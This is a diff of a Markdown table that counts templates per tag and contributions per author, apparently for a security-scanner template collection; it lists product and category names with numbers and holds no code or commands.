+| dell | 14 | canberbamber | 3 | | | | | | |
+| osint-political | 13 | davidmckennirey | 3 | | | | | | |
+| cuppa | 13 | thomas_from_offensity | 3 | | | | | | |
+| osint-dating | 13 | vagnerd | 3 | | | | | | |
+| graphql | 13 | bmcel | 2 | | | | | | |
+| airflow | 13 | 0xsmiley | 2 | | | | | | |
+| hashicorp | 13 | moritz nentwig | 2 | | | | | | |
+| laravel | 13 | mrharshvardhan | 2 | | | | | | |
+| sonicwall | 13 | ree4pwn | 2 | | | | | | |
+| cuppacms | 13 | bp0lr | 2 | | | | | | |
+| netgear | 13 | cocxanh | 2 | | | | | | |
+| ivanti | 13 | paradessia | 2 | | | | | | |
+| abstractapi | 13 | bing0o | 2 | | | | | | |
+| postgresql | 13 | supr4s | 2 | | | | | | |
+| rails | 13 | 0xsapra | 2 | | | | | | |
+| fortigate | 13 | afaq | 2 | | | | | | |
+| mysql | 13 | herry | 2 | | | | | | |
+| vbulletin | 12 | thevillagehacker | 2 | | | | | | |
+| kafka | 12 | shankaracharya | 2 | | | | | | |
+| webserver | 12 | z0ne | 2 | | | | | | |
+| doppler | 12 | w4cky_ | 2 | | | | | | |
+| netsweeper | 12 | maximus decimus | 2 | | | | | | |
+| zimbra | 12 | sinkettu | 2 | | | | | | |
+| ofbiz | 12 | danmcinerney | 2 | | | | | | |
+| newrelic | 12 | nuk3s3c | 2 | | | | | | |
+| drupal | 12 | ehsahil | 2 | | | | | | |
+| info-leak | 12 | kiblyn11 | 2 | | | | | | |
+| cache | 11 | cckuakilong | 2 | | | | | | |
+| iam | 11 | supras | 2 | | | | | | |
+| iis | 11 | wa1tf0rme | 2 | | | | | | |
+| spring | 11 | msegoviag | 2 | | | | | | |
+| xstream | 11 | github.com/its0x08 | 2 | | | | | | |
+| prometheus | 11 | thezakman | 2 | | | | | | |
+| django | 11 | randomdhiraj | 2 | | | | | | |
+| online_fire_reporting_system_project | 11 | usdag | 2 | | | | | | |
+| osint-video | 11 | streetofhackerr007 | 2 | | | | | | |
+| fastjson | 11 | 0xnirvana | 2 | | | | | | |
+| hikvision | 11 | michal mikolas (nanuqcz) | 2 | | | | | | |
+| jolokia | 11 | martincodes-de | 2 | | | | | | |
+| jetbrains | 11 | israel comazzetto dos reis | 2 | | | | | | |
+| online-fire-reporting | 11 | christianpoeschl | 2 | | | | | | |
+| phpmyadmin | 11 | redteambrasil | 2 | | | | | | |
+| phpgurukul | 11 | mohammedsaneem | 2 | | | | | | |
+| zabbix | 10 | amirhossein raeisi | 2 | | | | | | |
+| elasticsearch | 10 | c3l3si4n | 2 | | | | | | |
+| sitecore | 10 | ayadim | 2 | | | | | | |
+| solr | 10 | socketz | 2 | | | | | | |
+| dahua | 10 | bananabr | 2 | | | | | | |
+| xstream_project | 10 | codexlynx | 2 | | | | | | |
+| dropbox | 10 | charles d. | 2 | | | | | | |
+| digitalocean | 10 | kishore-hariram | 2 | | | | | | |
+| samsung | 10 | h0j3n | 2 | | | | | | |
+| db | 10 | brucelsone | 2 | | | | | | |
+| dedecms | 10 | ajaysenr | 2 | | | | | | |
+| thinkphp | 10 | koti2 | 2 | | | | | | |
+| solarview | 10 | korteke | 2 | | | | | | |
+| symfony | 10 | gal nagli | 2 | | | | | | |
+| glpi | 10 | davidegirardi | 2 | | | | | | |
+| python | 9 | notnotnotveg | 2 | | | | | | |
+| versa | 9 | x1m_martijn | 2 | | | | | | |
+| firebase | 9 | pxmme1337 | 2 | | | | | | |
+| crlf | 9 | paperpen | 2 | | | | | | |
+| moodle | 9 | joshlarsen | 2 | | | | | | |
+| exchange | 9 | nkxxkn | 2 | | | | | | |
+| bitbucket | 9 | liwermor | 2 | | | | | | |
+| cnvd2020 | 9 | t3l3machus | 2 | | | | | | |
+| gitea | 9 | thardt-praetorian | 2 | | | | | | |
+| sophos | 9 | lstatro | 2 | | | | | | |
+| lucee | 9 | sbani | 2 | | | | | | |
+| scada | 9 | hackerarpan | 2 | | | | | | |
+| cloudtrail | 9 | gevakun | 2 | | | | | | |
+| artica | 9 | florianmaak | 2 | | | | | | |
+| secret | 9 | bsysop | 2 | | | | | | |
+| kube | 9 | ep1csage | 2 | | | | | | |
+| wso2 | 9 | parzival | 2 | | | | | | |
+| facebook | 9 | lotusdll | 2 | | | | | | |
+| elastic | 9 | clarkvoss | 2 | | | | | | |
+| pfsense | 9 | d4vy | 2 | | | | | | |
+| sangfor | 9 | v0idc0de | 2 | | | | | | |
+| opencats | 9 | 0xelkomy | 2 | | | | | | |
+| vcenter | 9 | egemenkochisarli | 2 | | | | | | |
+| druid | 9 | 0xcrypto | 2 | | | | | | |
+| blind | 9 | zomsop82 | 2 | | | | | | |
+| progress | 9 | pbuff07 | 2 | | | | | | |
+| config-audit | 8 | shelled | 2 | | | | | | |
+| e-office | 8 | danielmofer | 2 | | | | | | |
+| manager | 8 | 666asd | 2 | | | | | | |
+| gateway | 8 | 8arthur | 2 | | | | | | |
+| huawei | 8 | udit_thakkur | 2 | | | | | | |
+| recon | 8 | convisoappsec | 2 | | | | | | |
+| symantec | 8 | joeldeleep | 2 | | | | | | |
+| microfocus | 8 | kre80r | 2 | | | | | | |
+| phpjabbers | 8 | hetroublemakr | 2 | | | | | | |
+| hms | 8 | sascha brendel | 2 | | | | | | |
+| cloud-enum | 8 | 0xrudra | 2 | | | | | | |
+| nexus | 8 | joshua rogers | 2 | | | | | | |
+| ognl | 8 | amsda | 2 | | | | | | |
+| wanhu | 8 | dheerajmadhukar | 2 | | | | | | |
+| oauth | 8 | foulenzer | 2 | | | | | | |
+| discord | 8 | dahse89 | 2 | | | | | | |
+| mlflow | 8 | y4er | 2 | | | | | | |
+| bucket | 8 | manas_harsh | 2 | | | | | | |
+| metadata | 8 | brenocss | 2 | | | | | | |
+| phpinfo | 8 | mzack9999 | 2 | | | | | | |
+| mirai | 8 | rafaelwdornelas | 2 | | | | | | |
+| cisco-switch | 8 | luci | 2 | | | | | | |
+| spotweb | 8 | thabisocn | 2 | | | | | | |
+| spotweb_project | 8 | geekby | 2 | | | | | | |
+| console | 8 | arliya | 2 | | | | | | |
+| error | 8 | ricardo maia (brainfork) | 2 | | | | | | |
+| emerge | 8 | nvn1729 | 2 | | | | | | |
+| osint-news | 8 | n-thumann | 2 | | | | | | |
+| default-page | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | |
+| go | 8 | g4l1t0 | 2 | | | | | | |
+| unauthenticated | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | |
+| odoo | 8 | myztique | 2 | | | | | | |
+| atom | 8 | 6mile | 2 | | | | | | |
+| monstra | 7 | k11h-de | 2 | | | | | | |
+| database | 7 | dbrwsky | 2 | | | | | | |
+| avtech | 7 | zy9ard3 | 2 | | | | | | |
+| mongodb | 7 | uomogrande | 2 | | | | | | |
+| nagiosxi | 7 | serrapa | 2 | | | | | | |
+| keking | 7 | dogancanbakir | 2 | | | | | | |
+| telesquare | 7 | sy3omda | 2 | | | | | | |
+| moodating | 7 | vavkamil | 2 | | | | | | |
+| landray | 7 | raesene | 2 | | | | | | |
+| joomla\! | 7 | borna nematzadeh | 1 | | | | | | |
+| mobileiron | 7 | invisiblethreat | 1 | | | | | | |
+| twitter | 7 | cravaterouge | 1 | | | | | | |
+| openemr | 7 | lrtk-coder | 1 | | | | | | |
+| nortekcontrol | 7 | matthew nickerson (b0than) @ | 1 | | | | | | |
| | | layer 8 security | | | | | | | |
-| telegram | 4 | djoevanka | 1 | | | | | | |
-| kibana | 4 | ledoubletake | 1 | | | | | | |
-| httpserver | 4 | infosecsanyam | 1 | | | | | | |
-| mostra | 4 | hyunsoo-ds | 1 | | | | | | |
-| mautic | 4 | petruknisme | 1 | | | | | | |
-| harmistechnology | 4 | kaizensecurity | 1 | | | | | | |
-| pie-register | 4 | ptonewreckin | 1 | | | | | | |
-| moveit | 4 | mesaglio | 1 | | | | | | |
-| jfrog | 4 | bughuntersurya | 1 | | | | | | |
-| grav | 4 | bjhulst | 1 | | | | | | |
-| opencms | 4 | notwhy | 1 | | | | | | |
-| concrete | 4 | metascan | 1 | | | | | | |
-| httpd | 4 | ipanda | 1 | | | | | | |
-| dahuasecurity | 4 | nytr0gen | 1 | | | | | | |
-| search | 4 | fq_hsu | 1 | | | | | | |
-| angular | 4 | fopina | 1 | | | | | | |
-| mcafee | 4 | sherlocksecurity | 1 | | | | | | |
-| roxy | 4 | shivanshkhari | 1 | | | | | | |
-| hongdian | 4 | whotwagner | 1 | | | | | | |
-| info | 4 | michael wedl | 1 | | | | | | |
-| hoteldruid | 4 | un-fmunozs | 1 | | | | | | |
-| webkul | 4 | carlosvieira | 1 | | | | | | |
-| flink | 4 | wpsec | 1 | | | | | | |
-| dotnet | 4 | ruppde | 1 | | | | | | |
-| ray | 4 | dorkerdevil | 1 | | | | | | |
-| flickr | 4 | babybash | 1 | | | | | | |
-| wp-statistics | 4 | mrcl0wnlab | 1 | | | | | | |
-| spark | 4 | rinolock | 1 | | | | | | |
-| metersphere | 4 | 0xcharan | 1 | | | | | | |
-| juniper | 4 | brianlam38 | 1 | | | | | | |
-| puppet | 4 | hakluke | 1 | | | | | | |
-| postmessage | 4 | fur1na | 1 | | | | | | |
-| ternaria | 4 | lethargynavigator | 1 | | | | | | |
-| umbraco | 4 | amanrawat | 1 | | | | | | |
-| h3c | 4 | samuelsamuelsamuel | 1 | | | | | | |
-| aria | 4 | irshadahamed | 1 | | | | | | |
-| aspose | 4 | mammad_rahimzada | 1 | | | | | | |
-| pixie | 4 | hexcat | 1 | | | | | | |
-| kentico | 4 | win3zz | 1 | | | | | | |
-| kevinlab | 4 | tangxiaofeng7 | 1 | | | | | | |
-| bamboo | 4 | egemenkochisarli | 1 | | | | | | |
-| veronalabs | 4 | philippdelteil | 1 | | | | | | |
-| churchcrm | 4 | daffianfo | 1 | | | | | | |
-| djangoproject | 4 | palanichamy_perumal | 1 | | | | | | |
-| qdpm | 4 | rumble773 | 1 | | | | | | |
-| wpdevart | 4 | bartu utku sarp | 1 | | | | | | |
-| pentaho | 4 | high | 1 | | | | | | |
-| d-link | 4 | arall | 1 | | | | | | |
-| password | 4 | kr1shna4garwal | 1 | | | | | | |
-| consul | 4 | rschio | 1 | | | | | | |
-| phppgadmin | 4 | 0h1in9e | 1 | | | | | | |
-| mantisbt | 4 | retr02332 | 1 | | | | | | |
-| newstatpress | 4 | rotembar | 1 | | | | | | |
-| cnvd2019 | 4 | professorabhay | 1 | | | | | | |
-| metasploit | 4 | osamahamad | 1 | | | | | | |
-| thruk | 3 | ynnirc | 1 | | | | | | |
-| instagram | 3 | sshell | 1 | | | | | | |
-| selenium | 3 | bad5ect0r | 1 | | | | | | |
-| securepoint | 3 | spac3wh1te | 1 | | | | | | |
-| adafruit | 3 | mabdullah22 | 1 | | | | | | |
-| mitel | 3 | gboddin | 1 | | | | | | |
-| forum | 3 | carrot2 | 1 | | | | | | |
-| school_dormitory_management_system_project | 3 | evan rubinstien | 1 | | | | | | |
-| circleci | 3 | _darrenmartyn | 1 | | | | | | |
-| dotnetnuke | 3 | apt-mirror | 1 | | | | | | |
-| ruckuswireless | 3 | zeyad azima | 1 | | | | | | |
-| aruba | 3 | harryha | 1 | | | | | | |
-| waf | 3 | elder tao | 1 | | | | | | |
-| credential | 3 | yashanand155 | 1 | | | | | | |
-| diagrams | 3 | miryangjung | 1 | | | | | | |
-| sudo | 3 | noamrathaus | 1 | | | | | | |
-| nuxtjs | 3 | jc175 | 1 | | | | | | |
-| etcd | 3 | youngpope | 1 | | | | | | |
-| cas | 3 | _harleo | 1 | | | | | | |
-| pandorafms | 3 | booboohq | 1 | | | | | | |
-| lansweeper | 3 | 1nf1n7y | 1 | | | | | | |
-| apollo | 3 | ling | 1 | | | | | | |
-| piwigo | 3 | izn0u | 1 | | | | | | |
-| rubygems | 3 | b0yd | 1 | | | | | | |
-| weiphp | 3 | banana69 | 1 | | | | | | |
-| trendnet | 3 | skylark-lab | 1 | | | | | | |
-| xerox | 3 | kagamigawa | 1 | | | | | | |
-| emqx | 3 | ola456 | 1 | | | | | | |
-| getsimple | 3 | toufik-airane | 1 | | | | | | |
-| messaging | 3 | shifacyclewla | 1 | | | | | | |
-| e-cology | 3 | joaonevess | 1 | | | | | | |
-| telnet | 3 | s1r1us | 1 | | | | | | |
-| yzmcms | 3 | arqsz | 1 | | | | | | |
-| payara | 3 | juicypotato1 | 1 | | | | | | |
-| spotify | 3 | 8authur | 1 | | | | | | |
-| redash | 3 | esonhugh | 1 | | | | | | |
-| selea | 3 | yuansec | 1 | | | | | | |
-| backdrop | 3 | berkdusunur | 1 | | | | | | |
-| smuggling | 3 | qianbenhyu | 1 | | | | | | |
-| airtable | 3 | revblock | 1 | | | | | | |
-| ithemes | 3 | sttlr | 1 | | | | | | |
-| afterlogic | 3 | 0xh7ml | 1 | | | | | | |
-| electron | 3 | jacalynli | 1 | | | | | | |
-| kavita | 3 | floriandewald | 1 | | | | | | |
-| segment | 3 | official_blackhat13 | 1 | | | | | | |
-| strangerstudios | 3 | opencirt | 1 | | | | | | |
-| lotus | 3 | jbertman | 1 | | | | | | |
-| netfortris | 3 | mayank_pandey01 | 1 | | | | | | |
-| mapbox | 3 | exid | 1 | | | | | | |
-| revive-adserver | 3 | p-l- | 1 | | | | | | |
-| i3geo | 3 | thebinitghimire | 1 | | | | | | |
-| hsphere | 3 | domenicoveneziano | 1 | | | | | | |
-| fileman | 3 | furkansayim | 1 | | | | | | |
-| xxljob | 3 | duty_1g | 1 | | | | | | |
-| unifi | 3 | nagli | 1 | | | | | | |
-| csrf | 3 | adnanekhan | 1 | | | | | | |
-| teampass | 3 | chron0x | 1 | | | | | | |
-| imap | 3 | freakyclown | 1 | | | | | | |
-| axis2 | 3 | rubina119 | 1 | | | | | | |
-| fanwei | 3 | lixts | 1 | | | | | | |
-| myeventon | 3 | watchtowr | 1 | | | | | | |
-| ninjaforms | 3 | kiransau | 1 | | | | | | |
-| kfm | 3 | 0xparth | 1 | | | | | | |
-| gvectors | 3 | hazana | 1 | | | | | | |
-| intercom | 3 | ransomsec | 1 | | | | | | |
-| learndash | 3 | wabafet | 1 | | | | | | |
-| intelbras | 3 | mihhailsokolov | 1 | | | | | | |
-| purchase-order | 3 | yashgoti | 1 | | | | | | |
-| postman | 3 | dievus | 1 | | | | | | |
-| softwarepublico | 3 | lark lab | 1 | | | | | | |
-| covenant | 3 | aaban solutions | 1 | | | | | | |
-| voipmonitor | 3 | _c0wb0y_ | 1 | | | | | | |
-| clientid | 3 | dk999 | 1 | | | | | | |
-| contentful | 3 | lrtk-coder | 1 | | | | | | |
-| targa | 3 | nobody | 1 | | | | | | |
-| webadmin | 3 | nielsing | 1 | | | | | | |
-| openwrt | 3 | flag007 | 1 | | | | | | |
-| sony | 3 | natto97 | 1 | | | | | | |
-| woodwing | 3 | aaron_costello | 1 | | | | | | |
-| | | (@conspiracyproof) | | | | | | | |
-| h2o | 3 | affix | 1 | | | | | | |
-| fuelcms | 3 | kiks7 | 1 | | | | | | |
-| netflix | 3 | marcio mendes | 1 | | | | | | |
-| shell | 3 | luqmaan hadia | 1 | | | | | | |
-| siemens | 3 | andirrahmani1 | 1 | | | | | | |
-| bash | 3 | pry0cc | 1 | | | | | | |
-| watchguard | 3 | vulnspace | 1 | | | | | | |
-| yii | 3 | mohammad reza omrani | | 1 | | | | | | |
-| | | @omranisecurity | | | | | | | |
-| influxdb | 3 | patrick pirker | 1 | | | | | | |
-| std42 | 3 | axrk | 1 | | | | | | |
-| checkpoint | 3 | mayankpandey01 | 1 | | | | | | |
-| netlify | 3 | jeya.seelan | 1 | | | | | | |
-| buffalo | 3 | noah @thesubtlety | 1 | | | | | | |
-| zeroshell | 3 | omarjezi | 1 | | | | | | |
-| droneci | 3 | h4kux | 1 | | | | | | |
-| esafenet | 3 | colbyjack1134 | 1 | | | | | | |
-| jitsi | 3 | dawid-czarnecki | 1 | | | | | | |
-| poms | 3 | fmunozs | 1 | | | | | | |
-| trixbox | 3 | j33n1k4 | 1 | | | | | | |
-| axway | 3 | numan türle | 1 | | | | | | |
-| nuget | 3 | jfbes | 1 | | | | | | |
-| inspur | 3 | schniggie | 1 | | | | | | |
-| flutter | 3 | naglis | 1 | | | | | | |
-| carel | 3 | zn9988 | 1 | | | | | | |
-| webalizer | 3 | xshuden | 1 | | | | | | |
-| nortek | 3 | majidmc2 | 1 | | | | | | |
-| sharepoint | 3 | phyr3wall | 1 | | | | | | |
-| actuator | 3 | zsusac | 1 | | | | | | |
-| rstudio | 3 | bjxsec | 1 | | | | | | |
-| dzzoffice | 3 | wlayzz | 1 | | | | | | |
-| thefactory | 3 | jonathanwalker | 1 | | | | | | |
-| sitemap | 3 | davidfegyver | 1 | | | | | | |
-| dotcms | 3 | ramkrishna sawant | 1 | | | | | | |
-| pulsar | 3 | shelld3v | 1 | | | | | | |
-| dreambox | 3 | kareemse1im | 1 | | | | | | |
-| osticket | 3 | miguelsegoviagil | 1 | | | | | | |
-| sqlite | 3 | gpiechnik2 | 1 | | | | | | |
-| qlik | 3 | mantissts | 1 | | | | | | |
-| itop | 3 | pdp | 1 | | | | | | |
-| ueditor | 3 | bernardo rodrigues | 1 | | | | | | |
+| instrusive | 7 | olewagner | 1 | | | | | | |
+| rfi | 7 | youngpope | 1 | | | | | | |
+| car_rental_management_system_project | 7 | zinminphy0 | 1 | | | | | | |
+| slack | 7 | hlop | 1 | | | | | | |
+| vpc | 7 | 0h1in9e | 1 | | | | | | |
+| filemanager | 7 | kareemse1im | 1 | | | | | | |
+| activemq | 7 | tehtbl | 1 | | | | | | |
+| ruckus | 7 | aresx | 1 | | | | | | |
+| opensis | 7 | 8authur | 1 | | | | | | |
+| solarwinds | 7 | kiransau | 1 | | | | | | |
+| maps | 7 | bugvsme | 1 | | | | | | |
+| gogs | 7 | knassar702 | 1 | | | | | | |
+| shopify | 7 | pepitoh | 1 | | | | | | |
+| fortios | 7 | _harleo | 1 | | | | | | |
+| blockchain | 7 | soyelmago | 1 | | | | | | |
+| contec | 7 | x6263 | 1 | | | | | | |
+| cacti | 7 | k3rwin | 1 | | | | | | |
+| exploitdb | 7 | jna1 | 1 | | | | | | |
+| websphere | 7 | zhenwarx | 1 | | | | | | |
+| f5 | 7 | hakluke | 1 | | | | | | |
+| linkedin | 7 | nielsing | 1 | | | | | | |
+| bigip | 7 | ooooooo_q | 1 | | | | | | |
+| teamcity | 7 | co0nan | 1 | | | | | | |
+| vms | 7 | iampritam | 1 | | | | | | |
+| squirrelmail | 7 | yaser_s | 1 | | | | | | |
+| nacos | 7 | 0xcharan | 1 | | | | | | |
+| bloofox | 7 | am0nt31r0 | 1 | | | | | | |
+| oos | 7 | hazana | 1 | | | | | | |
+| fpd | 7 | chetgan | 1 | | | | | | |
+| pmb | 7 | domenicoveneziano | 1 | | | | | | |
+| liferay | 6 | opencirt | 1 | | | | | | |
+| servicenow | 6 | stupidfish | 1 | | | | | | |
+| doctor-appointment-system | 6 | luqmaan hadia | 1 | | | | | | |
+| cobbler | 6 | andirrahmani1 | 1 | | | | | | |
+| bmc | 6 | s1r1u5_ | 1 | | | | | | |
+| webmin | 6 | lamscun | 1 | | | | | | |
+| flutterwave | 6 | zn9988 | 1 | | | | | | |
+| vrealize | 6 | justmumu | 1 | | | | | | |
+| cockpit | 6 | bernardo rodrigues | 1 | | | | | | |
| | | @bernardofsr | | | | | | | |
-| dev.pucit.edu.pk | 3 | r3nz0 | 1 | | | | | | |
-| bitrix24 | 3 | matt miller | 1 | | | | | | |
-| tableau | 3 | undefl0w | 1 | | | | | | |
-| cybelesoft | 3 | mariam tariq | 1 | | | | | | |
-| mpsec | 3 | geraldino2 | 1 | | | | | | |
-| webcam | 3 | adamparsons | 1 | | | | | | |
-| webtareas_project | 3 | pussycat0 | 1 | | | | | | |
-| fanruan | 3 | abbas.heybati | 1 | | | | | | |
-| gradle | 3 | intx0x80 | 1 | | | | | | |
-| empirecms | 3 | luskabol | 1 | | | | | | |
-| eshop | 3 | s1r1u5_ | 1 | | | | | | |
-| thinfinity | 3 | calumjelrick | 1 | | | | | | |
-| 3cx | 3 | danfaizer | 1 | | | | | | |
-| graph | 3 | shivampand3y | 1 | | | | | | |
-| pypi | 3 | millermedia | 1 | | | | | | |
-| decision-server | 3 | liquidsec | 1 | | | | | | |
-| purchase-order-management-system | 3 | b4uh0lz | 1 | | | | | | |
-| glassfish | 3 | petergrifin | 1 | | | | | | |
-| magnolia | 3 | b0rn2r00t | 1 | | | | | | |
-| dos | 3 | alevsk | 1 | | | | | | |
-| lighttpd | 3 | rodnt | 1 | | | | | | |
-| gnu | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | |
-| complete_online_job_search_system_project | 3 | remonsec | 1 | | | | | | |
-| listserv | 3 | west-wise | 1 | | | | | | |
-| petya | 3 | thelicato | 1 | | | | | | |
-| netdata | 3 | knassar702 | 1 | | | | | | |
-| mailgun | 3 | alexrydzak | 1 | | | | | | |
-| r-seenet | 3 | pwnwithlove | 1 | | | | | | |
-| ixcache | 3 | sanineng | 1 | | | | | | |
-| boldgrid | 3 | pbuff07 | 1 | | | | | | |
-| newsletter | 3 | co0nan | 1 | | | | | | |
-| tplus | 3 | bibeksapkota (sar00n) | 1 | | | | | | |
-| nifi | 3 | mah3sec_ | 1 | | | | | | |
-| wwbn | 3 | aresx | 1 | | | | | | |
-| superadmin | 3 | houdinis | 1 | | | | | | |
-| favicon | 3 | xstp | 1 | | | | | | |
-| open-emr | 3 | 0xprial | 1 | | | | | | |
-| ampps | 3 | yiran | 1 | | | | | | |
-| webtareas | 3 | zandros0 | 1 | | | | | | |
-| revive | 3 | yavolo | 1 | | | | | | |
-| zeit | 3 | mr.bobo hp | 1 | | | | | | |
-| superset | 3 | notsoevilweasel | 1 | | | | | | |
-| western_digital | 3 | mubassirpatel | 1 | | | | | | |
-| zendesk | 3 | bywalks | 1 | | | | | | |
-| proftpd | 3 | k3rwin | 1 | | | | | | |
-| axis | 3 | secthebit | 1 | | | | | | |
-| nc | 3 | lamscun | 1 | | | | | | |
-| chatgpt | 3 | anon-artist | 1 | | | | | | |
-| webnus | 3 | elitebaz | 1 | | | | | | |
-| subrion | 3 | jas37 | 1 | | | | | | |
-| switch | 3 | ndmalc | 1 | | | | | | |
-| grp | 3 | | | | | | | | |
-| draytek | 3 | | | | | | | | |
-| rlm | 3 | | | | | | | | |
-| asus | 3 | | | | | | | | |
-| vercel | 3 | | | | | | | | |
-| supsystic | 3 | | | | | | | | |
-| aptus | 3 | | | | | | | | |
-| loytec | 3 | | | | | | | | |
-| gibbon | 3 | | | | | | | | |
-| epson | 3 | | | | | | | | |
-| steve | 3 | | | | | | | | |
-| processwire | 3 | | | | | | | | |
-| particle | 3 | | | | | | | | |
+| express | 6 | kagamigawa | 1 | | | | | | |
+| rat | 6 | topscoder | 1 | | | | | | |
+| plesk | 6 | infosecsanyam | 1 | | | | | | |
+| gcp | 6 | djoevanka | 1 | | | | | | |
+| geoserver | 6 | kiks7 | 1 | | | | | | |
+| magmi | 6 | imhunterand | 1 | | | | | | |
+| beyondtrust | 6 | mesaglio | 1 | | | | | | |
+| chanjet | 6 | dorkerdevil | 1 | | | | | | |
+| splunk | 6 | ruppde | 1 | | | | | | |
+| lfprojects | 6 | dali | 1 | | | | | | |
+| 74cms | 6 | millermedia | 1 | | | | | | |
+| kubelet | 6 | _darrenmartyn | 1 | | | | | | |
+| microstrategy | 6 | ola456 | 1 | | | | | | |
+| asp | 6 | mariam tariq | 1 | | | | | | |
+| paypal | 6 | evan rubinstien | 1 | | | | | | |
+| jetty | 6 | 0xparth | 1 | | | | | | |
+| advantech | 6 | mantissts | 1 | | | | | | |
+| jamf | 6 | mlec | 1 | | | | | | |
+| keycloak | 6 | carson chan | 1 | | | | | | |
+| ldap | 6 | th3r4id | 1 | | | | | | |
+| tikiwiki | 6 | pjborah | 1 | | | | | | |
+| jeecg | 6 | diablo | 1 | | | | | | |
+| sql | 6 | gboddin | 1 | | | | | | |
+| elfinder | 6 | f0xy | 1 | | | | | | |
+| log | 6 | ling | 1 | | | | | | |
+| openvpn | 6 | igibanez | 1 | | | | | | |
+| doctor_appointment_system_project | 6 | h4sh5 | 1 | | | | | | |
+| typo3 | 6 | denandz | 1 | | | | | | |
+| server | 6 | ndmalc | 1 | | | | | | |
+| synacor | 6 | tim_koopmans | 1 | | | | | | |
+| leak | 6 | luqman | 1 | | | | | | |
+| asus | 6 | puben | 1 | | | | | | |
+| sonarqube | 6 | d0rkerdevil | 1 | | | | | | |
+| couchdb | 6 | remi gascou (podalirius) | 1 | | | | | | |
+| zhiyuan | 6 | barthy.koeln | 1 | | | | | | |
+| minio | 6 | retr02332 | 1 | | | | | | |
+| swagger | 5 | aaron_costello | 1 | | | | | | |
+| | | (@conspiracyproof) | | | | | | | |
+| magmi_project | 5 | elouhi | 1 | | | | | | |
+| circarlife | 5 | revblock | 1 | | | | | | |
+| kkfileview | 5 | un-fmunozs | 1 | | | | | | |
+| connectwise | 5 | team syslifters / christoph | 1 | | | | | | |
+| | | mahrl | | | | | | | |
+| resin | 5 | vinit989 | 1 | | | | | | |
+| cve2007 | 5 | mammad_rahimzada | 1 | | | | | | |
+| metinfo | 5 | sttlr | 1 | | | | | | |
+| cdata | 5 | christbowel | 1 | | | | | | |
+| graylog | 5 | sec_hawk | 1 | | | | | | |
+| cnvd2023 | 5 | omarjezi | 1 | | | | | | |
+| terramaster | 5 | kishore krishna (sillydaddy) | 1 | | | | | | |
+| genetechsolutions | 5 | jrolf | 1 | | | | | | |
+| awstats | 5 | hardik-rathod | 1 | | | | | | |
+| acm | 5 | nobody | 1 | | | | | | |
+| rseenet | 5 | toufik-airane | 1 | | | | | | |
+| ethereum | 5 | axrk | 1 | | | | | | |
+| totolink | 5 | phillipo | 1 | | | | | | |
+| axigen | 5 | xcapri | 1 | | | | | | |
+| fatpipe | 5 | kabirsuda | 1 | | | | | | |
+| tibco | 5 | xshuden | 1 | | | | | | |
+| adminer | 5 | spac3wh1te | 1 | | | | | | |
+| hpe | 5 | pphuahua | 1 | | | | | | |
+| apisix | 5 | r3nz0 | 1 | | | | | | |
+| matrix | 5 | y0no | 1 | | | | | | |
+| openai | 5 | twitter.com/dheerajmadhukar | 1 | | | | | | |
+| mssql | 5 | mhdsamx | 1 | | | | | | |
+| openfire | 5 | shelld3v | 1 | | | | | | |
+| zzzcms | 5 | irshadahamed | 1 | | | | | | |
+| openstack | 5 | sorrowx3 | 1 | | | | | | |
+| sftp | 5 | alperenkesk | 1 | | | | | | |
+| avaya | 5 | pussycat0 | 1 | | | | | | |
+| decision-center | 5 | amirmsafari | 1 | | | | | | |
+| agentejo | 5 | husain | 1 | | | | | | |
+| chamilo | 5 | cbadke | 1 | | | | | | |
+| jabber | 5 | w8ay | 1 | | | | | | |
+| storage | 5 | jeya.seelan | 1 | | | | | | |
+| strapi | 5 | tangxiaofeng7 | 1 | | | | | | |
+| firmware | 5 | kresec | 1 | | | | | | |
+| akamai | 5 | skylark-lab | 1 | | | | | | |
+| dionaea | 5 | remonsec | 1 | | | | | | |
+| cloudflare | 5 | xeldax | 1 | | | | | | |
+| qdpm | 5 | wabafet | 1 | | | | | | |
+| jwt | 5 | prettyboyaaditya | 1 | | | | | | |
+| nuuo | 5 | bibeksapkota (sar00n) | 1 | | | | | | |
+| square | 5 | hateshape | 1 | | | | | | |
+| glpi-project | 5 | aayush vishnoi | 1 | | | | | | |
+| circontrol | 5 | iphantasmic | 1 | | | | | | |
+| adb | 5 | osamahamad | 1 | | | | | | |
+| carrental | 5 | davidfegyver | 1 | | | | | | |
+| pyload | 5 | aaban solutions | 1 | | | | | | |
+| mikrotik | 5 | professorabhay | 1 | | | | | | |
+| gocd | 5 | zsusac | 1 | | | | | | |
+| sentry | 5 | r3s ost | 1 | | | | | | |
+| jupyter | 5 | juicypotato1 | 1 | | | | | | |
+| wbce | 5 | sdcampbell | 1 | | | | | | |
+| asana | 5 | becivells | 1 | | | | | | |
+| vehicle_service_management_system_project | 5 | m0ck3d | 1 | | | | | | |
+| crushftp | 5 | babybash | 1 | | | | | | |
+| redmine | 5 | elitebaz | 1 | | | | | | |
+| open-emr | 5 | floriandewald | 1 | | | | | | |
+| papercut | 5 | mah3sec_ | 1 | | | | | | |
+| goanywhere | 5 | rotembar | 1 | | | | | | |
+| react | 5 | erethon | 1 | | | | | | |
+| qnap | 5 | rivalsec | 1 | | | | | | |
+| froxlor | 5 | numan türle | 1 | | | | | | |
+| hybris | 5 | couskito | 1 | | | | | | |
+| ems | 5 | francescocarlucci | 1 | | | | | | |
+| paloaltonetworks | 5 | d4ly | 1 | | | | | | |
+| percha | 5 | lixts | 1 | | | | | | |
+| voip | 5 | lingtren | 1 | | | | | | |
+| hoteldruid | 5 | chesterblue | 1 | | | | | | |
+| webview | 5 | allenwest24 | 1 | | | | | | |
+| parallels | 5 | daffianfo | 1 | | | | | | |
+| sysaid | 5 | tirtha | 1 | | | | | | |
+| schneider-electric | 5 | omarkurt | 1 | | | | | | |
+| caucho | 5 | noobexploiter | 1 | | | | | | |
+| thedigitalcraft | 5 | brabbit10 | 1 | | | | | | |
+| xmlrpc | 5 | shivampand3y | 1 | | | | | | |
+| 10web | 5 | fur1na | 1 | | | | | | |
+| tenda | 5 | aceseven (digisec360) | 1 | | | | | | |
+| avideo | 5 | rschio | 1 | | | | | | |
+| craftcms | 5 | banana69 | 1 | | | | | | |
+| elementor | 5 | rubina119 | 1 | | | | | | |
+| web3 | 5 | marcio mendes | 1 | | | | | | |
+| igniterealtime | 4 | yashgoti | 1 | | | | | | |
+| moveit | 4 | willd96 | 1 | | | | | | |
+| dom | 4 | ph33rr | 1 | | | | | | |
